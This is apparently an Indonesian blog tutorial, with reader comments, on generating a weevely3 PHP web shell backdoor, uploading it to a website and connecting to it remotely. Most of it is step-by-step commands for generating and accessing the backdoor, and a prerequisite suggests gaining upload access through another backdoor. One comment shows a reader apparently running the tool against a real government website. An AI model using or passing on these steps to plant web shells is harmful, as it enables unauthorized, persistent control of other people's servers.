Tutorial BackConnect menggunakan weevely3 di ubuntu


A. Pengertian

  Weevely adalah shell web command line yang secara dinamis diperpanjang selama jaringan pada saat runtime, dirancang untuk administrasi server jarak jauh dan pengujian penetrasi.

Terminal mengeksekusi kode remote sewenang-wenang melalui agen PHP tapak kecil yang berada di server HTTP. Lebih dari 30 modul membentuk administrasi web yang mudah disesuaikan dan backdoor pasca-eksploitasi untuk pemeliharaan akses, eskalasi hak istimewa dan pergerakan lateral jaringan, bahkan di lingkungan yang dibatasi.


B. Latar Belakang

Semakin banyak nya orang yang bekerja dalam dunia IT Security tentu perlu mengetahui teknik apa saja yang di gunakan untuk melakukan sebuah penetrasi test, maka dari itu kali ini saya akan membahas salah satu web tools penetrasi test dengan jenis backdoor remote shell.

C. Maksud dan tujuan 

weevely di buat sebagai remote shell, dengan demikian website bisa di remote / di control dari jarak jauh tanpa harus masuk atau mengakses domain website tersebut.

D. Hal yang di butuhkan

1. Niat dan baca basmallah
2. PC / Laptop menggunakan OS Ubuntu / Sejenis.
3. akses website untuk upload backdoor weevely (bisa dari shell backdoor , cpanel dll.)
4. Nyali dan iman h3h3 :'v

E. Jangka waktu pelaksanaan

waktu yang saya butuhkan kurang lebih 10 menit

F. Langkah pelaksanaan

1. Pertama yang harus di lakukan adalah mempunyai file atau laptop kita sudah terinstall weevely, maka dari itu lakukan perintah di berikut.

# git clone https://github.com/alintamvanz/weevely3.git

NB : jika PC / Laptop anda belum terinstall "git" maka install dulu, gimana caranya? cari tutor bejibun hwhw..


2. Setelah itu , install dependensi dari weevely, supaya weevely3 bisa berjalan tanpa error dan lanjar h3h3..

# apt-get install python-prettytable python-mako python-dateutil python-socks python-yaml python



3. Next, generate terlebih dahulu backdoor dari weevely3 nya menggunaka perintah

# python weevely.py generate <password> <output-backdoor>

sebagai contoh :

# python weevely.py generate passwordnya bekdornya.php


NB : Sebelumnya harus masuk directory "weevely3" dooloo.. "cd weevely3" Tq. :'v

4. Selanjutnya , upload file hasil output weevely tadi yang saya berinama "bekdornya.php" ke website yang telah di siapkan.




5. Setelah terUpload, lanjut ke proses remote weevely nya.

# python weevely.py http://website/path/weevely-bekdor.php <password>

sebagai contoh

# python weevely.py http://wibu.pro/webshell/bekdornya.php passwordnya



Jika sudah seperti gambar di atas berarti kita sudah berhasil masuk melalui backdoor php yang di generate dari weevely. artinya backconnect sukses !


Update :

Tutorial Video



Referensi :

https://github.com/epinna/weevely3
http://www.100security.com.br/weevely/

Postingan terkait:

7 Tanggapan untuk "Tutorial BackConnect menggunakan weevely3 di ubuntu"

  1. Wadoh gelud lah mhanx ga ada video nya buat kan lah atau saya eue..

    BalasHapus
  2. Oce mhank, kapan2 w buatin

    BalasHapus
  3. Traceback (most recent call last):
    File "weevely.py", line 98, in
    main(arguments)
    File "weevely.py", line 48, in main
    modules.load_modules(session)
    File "C:\Users\Morishima Haruka\Documents\Pentest\weevely3-master\weevely3-mas
    ter\core\modules.py", line 24, in load_modules
    (module_group, module_name), fromlist=["*"]
    File "C:\Users\Morishima Haruka\Documents\Pentest\weevely3-master\weevely3-mas
    ter\modules\shell\php.py", line 4, in
    from core.channels.channel import Channel
    File "C:\Users\Morishima Haruka\Documents\Pentest\weevely3-master\weevely3-mas
    ter\core\channels\channel.py", line 7, in
    import socks
    ImportError: No module named socks

    kenapa ya

    BalasHapus
    Balasan
    1. dependencies "socks" pada python nya belum ke install bwank

      Hapus
  4. fadlyah-virtual-machine weevely3 # python weevely.py fadlygans http://jdihpinrangkab.com/iracans.php
    [!][weevely] Exiting: Expected URL format 'http(s)://host/agent.php'

    kenapa ni ?

    BalasHapus